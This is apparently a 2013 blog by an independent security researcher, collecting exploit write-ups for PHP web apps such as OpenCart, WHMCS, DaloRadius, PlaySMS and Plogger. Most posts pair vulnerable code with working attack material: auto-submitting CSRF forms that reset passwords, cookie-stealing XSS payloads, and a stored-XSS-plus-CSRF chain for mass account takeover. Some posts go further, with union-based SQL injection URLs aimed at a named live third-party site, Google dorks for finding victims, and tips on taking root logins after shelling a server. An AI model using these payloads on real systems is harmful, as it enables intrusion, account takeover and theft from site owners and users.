iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

Posted by Saadi On Saturday 14 December 2013 1 comments
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/profile.php" method=post >
                        <input type=hidden size=30 maxlength=30 name=userid value="5">
        <input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
        <input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
        <input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
                        <input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
               <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
       <input type=submit   name=btnSaveChanges class=button value='Save'>
</form>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email ,  after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher
READ MORE

PlaySMS <= 0.9.9.2 CSRF

Posted by Saadi On Monday 9 December 2013 1 comments
http://www.exploit-db.com/exploits/30177/

# Exploit Title  : PlaySMS <= 0.9.9.2 CSRF
# Date             : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link  : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:

<html>
 <body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">


<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>

<input type=submit class=button value='Save'>
</form>
</html>

#Independent Pakistani Security Researcher
READ MORE

Mybb Ajaxfs Plugin Sql Injection vulnerability

Posted by Saadi On Tuesday 19 November 2013 4 comments
Welcome once again :D

Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541

So i just start to pentest the plugin and in  just two minutes i found the bug.
So here are the details

Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2

The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php

POC
code:


1  if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");



2 if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
http://localhost/Upload/ajaxfs.php?usertooltip=1'
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 
Google DORK : inurl:ajaxfs.php
#Independent Pakistani Security Researcher

READ MORE

WHMCS <=5.2.12 PHP Object Injection

Posted by Saadi On Saturday 2 November 2013 4 comments
Hi all , was alot busy with my work ,  so now here comes some new stuff PHP object injection in all whmcs versions.

http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717


# Exploit Title               : WHMCS <=5.2.12 PHP Object Injection
                                  :Web Host Manager Complete Solution
# Date                         : 2013/10/24
# Exploit Author          : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link          : http://www.whmcs.com
# Author HomePage   : http://security-geeks.blogspot.com
# Tested on: Server     : Apache/2.2.15 PHP/5.3.3

#PHP Object Injection

#Affected Versions:
WHMCS <=5.2.12

#Vulnerability Description
Poc

The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes S_COOKIE data to unserialize function without sanitizing it.
Code on Line 711

$sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
$sortdata = unserialize( base64_decode( $sortdata ) );

User input passed through the Cookies is not properly sanitized before being used in
an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the
application scope.

Some of the files which are calling sortableint() function are

/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php


#Independent Pakistani Security Researcher
READ MORE

OpenCart Latest Version CSRF

Posted by Saadi On Thursday 4 April 2013 23 comments
Hi ,  from last some days i was pentesting Opencart A Shopping Cart System .

 www.opencart.com

And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.

So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team  that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . .  now this is quite embarrassing that the latest version is still vuln :(

I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .

Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/


# Exploit Title : OpenCart CSRF
# Date     : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web   : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.

Header

----------------------------------------------------------
http://localhost/index.php?route=account/password

POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"

123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"

123456789
-----------------------------2465524120551--

Response

HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------

Simple Poc to change user Password

<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">

    <div class="content">
      <table class="form">
        <tbody><tr>
     
          <td><input name="password" value="987654321" type="hidden">
            </td>
        </tr>
        <tr>
       
          <td><input name="confirm" value="987654321" type="hidden">
            </td>
        </tr>
      </tbody></table>
    </div>
    <div class="buttons">
 
      <div class="right"><input value="Continue" class="button" type="submit"></div>
    </div>
  </form>

edit

OpenCart <= 1.5.6.1 SQL Injection

#Independent Pakistani Security Researcher


READ MORE

OpenCart Local Path Disclose - LPD

Posted by Saadi On Saturday 30 March 2013 3 comments
Hi ,  today OpenCart .
Just setup Opencart to give it a pen-test and here is initial results.

Oka Bug

OpenCart Disclose the Local Path Of server on many location , Some of them are . .

http://localhost/opencart/upload/catalog/controller/account/address.php

http://localhost/opencart/upload/catalog/controller/account/account.php

http://localhost/opencart/upload/catalog/controller/account/order.php . . .etc

Live Demo

OpenCart Own Domain

http://demo.opencart.com/catalog/controller/account/address.php

http://spotonsolutions.net/catalog/controller/account/address.php




How this issue comes And patching . . . . 

When you are including different php file in one file and declaration of some variable / function in first file and using that variable / function in that file you included second.Now if this second file access by anyone directly you will got some error like ...
Variable undeclared..
Class not found blah blah.

Like we have index.php with code

include('1.php');
include('2.php');

Code of 1.php

class a {
public :
$count=0;
}

Code of 2.php

$classs = new a();


Now as you see if you access 2.php directly you will got error

Class a not found.
Because class a is define in 1.php

But if you access index.php
it will work perfect as
their is class a in 1.php and then 2.php is using that class..

So this is how many times LPD occurs.

Patching . . . . 
Simplest patching
turn error reporting off .

Or

You can also do .htaccess
Order deny,allow
Deny from all


Or

You can do this
Just declare any variable in index.php or in that file you will going to include 1.php and 2.php
like

if (!defined("direct access")) {
define('
direct access
', true);
}


and then just add this on top of 1.php and 2.php

defined('
direct access
') or die("Access Denied.");

what it does simply main file declare a variable and the included files check if that variable is set or not..As you already set the value in main file it will run perfectly.
But if you direct access those files that are included in main file.then as they check if variable is set or not and in direct accessing the file will not have that variable set so it will go in die showing u access denied.

So this for today..

# Independent Pakistani Security Researcher

 


READ MORE

Concrete Latest Version 5.6.1.2 CSRF--Logout and Persistent XSS

Posted by Saadi On Tuesday 26 March 2013 3 comments
Hi , today concrete

Concrete is a famous Content management system.
For more
www.concrete5.org

So i was just pen-testing it a bit and initially just found that It is not using any security token to protect making
admin/users logout (CSRF).

http://localhost/concrete/index.php/login/logout/
In simple terms just by sending this link to any user which has valid session will going to logout.
Header:
GET http://localhost/concrete/index.php/login/logout/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive



oka XSS
I found XSS inside the admin panel but still every thing should be secure.
Bug

Concrete is not sanitizing the POST field user input of tags.
When you are making a post to publish on the blog their is an option to enter the TAG for the post.
So this POST filed is vulnerable to XSS.

Goto Write post inside admin panel-->then just enter any XSS vector in TAG filed and you will get results.
And it is store/persistent XSS.



So this is for today.

#independent Pakistani Security Researcher

READ MORE

Free Hosting Manager V 2.0.2 Multiple SQLi

Posted by Saadi On Saturday 23 March 2013 2 comments
Hi , for today Free hosting manager.Free hosting manager is a free script to install and run your hosting.
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.

Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.

Exploit Links

http://www.exploit-db.com/exploits/24879

http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html

http://1337day.com/exploit/20555

Exploit Details
-------------------------------------------------------------------------

# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                        
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                            
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
                                                                                   
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher
READ MORE

Bug Bounty Paypal -- No luck :)

Posted by Saadi On 2 comments
Hi , some days ago found a XSS bug in Paypal Services but was not eligible to get the bounty ,well no worries will try again :D . . .

It was subdomain of billmelater.com

Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com

They are getting integer value from the GET Field and using it as time to redirect you on other pages..

Vuln Link  :
 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>

 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>

ScreenShot




So this is for today  :)

#IndependentPakistaniSecurityResearcher

READ MORE

DaloRadius CSRF / XSS / SQL Injection

Posted by Saadi On Saturday 16 March 2013 2 comments
Hi , just browsing Sourceforge and see a script having more than 1 thousand downloads per week ,  so not bad to give it a pentest and found some stuff in it :)

Exploit Links

http://www.exploit-db.com/exploits/24849

http://1337day.com/exploit/20513

http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html

Exploit

-------------------------------------------------------------------------
# Software      : DaloRadius    SQLi / CSRF / XSS                                                                                                            
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 15/3/13   
# Vendors  : http://www.daloradius.com/ 
# Download Link : http://sourceforge.net/projects/daloradius/   
                                                                                     
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+

DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations.
Some OF them..
Change Admin Password

<form action="daloradius/config-operators-edit.php" method="post">
        <input type="hidden" value="administrator" name="operator_username" />

<div class="tabber">

     <div class="tabbertab" title="Operator Info">

  <fieldset>
  
    <h302></h302>
    <br/>

                <label for='operator_password' class='form'></label>
                <input name='password' id='password'
    type='hidden'      value='radius1' tabindex=101 />
                <br/>

                <br/><br/>
                <hr><br/>

                <input type='submit' name='submit' value='Apply' class='button' />

Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540

Post Data:
operator_username=administrator&password=radius1&submit=Apply

+---+[ SQL Injection ]+---+

Their are multiple SQLI in the script some are..
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc

Proof Of Concept
in acct-ipaddress.php

isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
  isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";  


  isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";

  .
  .
  .
 $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";


In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
    $username = $_GET['username'];



  $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";



+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>

#Independent Pakistani Security Researcher
READ MORE

Web Cookbook SQL Injection / XSS

Posted by Saadi On Tuesday 12 March 2013 1 comments
Exploit Links: 

http://www.exploit-db.com/exploits/24742/

http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html

http://1337day.com/exploit/20501

Exploit

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher

Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]

Database Name:
db394647325

http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--

 http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...
READ MORE

Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities

Posted by Saadi On Monday 4 March 2013 1 comments
Hi Today Nconf v1.3 ,Ahh script is highly insecure so just Reported Few of them..
 Exploit Links: 
http://1337day.com/exploit/20475 
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html

# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
 # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
Some OF them Are Blind Sqli In handle_item.php on
Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"];
 delete_attr.php POST DATA :
id=15'&name=&delete=yes&submit=Delete
Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';

And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more...

A Simple Reflected XSS

http://localhost/nconf/handle_item.php?item=XSS Vector Poc $item_class = $_GET["item"]; . . echo without Sanitization echo ''.ucfirst($handle_action).' '.$item_class.'';
A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a  

#Independent Pakistani Security Researcher
READ MORE

Plogger Gallery RC 1 Multiple Vuln [SQLI-XSS-CRSF]

Posted by Saadi On Sunday 3 March 2013 1 comments
hi , 2 days back my friend need a cms on image gallery so after finding one i Pentest Script and Found highly Insecure. Complete Exploit Can be View Here. 1337day : http://1337day.com/exploit/20470 PacketStrome: http://packetstormsecurity.com/files/120619/PloggerGallery-1.0-RC1-CSRF-XSS-SQL-Injection.html P0c -------------------------------------------------------------------------
# Software : PloggerGallery Version 1.0 RC1
# Author : Saadat Ullah
# Date : 2/3/13
# Dork : Use Ur Mind
# Software Link : http://www.plogger.org/download/
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+

Injectable On entries_per_pag Parameter In Feedback.php

http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'

p0c

if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.

// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);

+---+[ CSRF In Admin Panel ]+---+

Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..

+---+[ XSS ]+---+

Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..

XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.


Uploading the File and enter name to any XSS Vector..

http://localhost/plogger/plog-admin/plog-upload.php

It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.

XSS In Edit Comment.CSRF + XSS

<html>
<head>
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>


Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
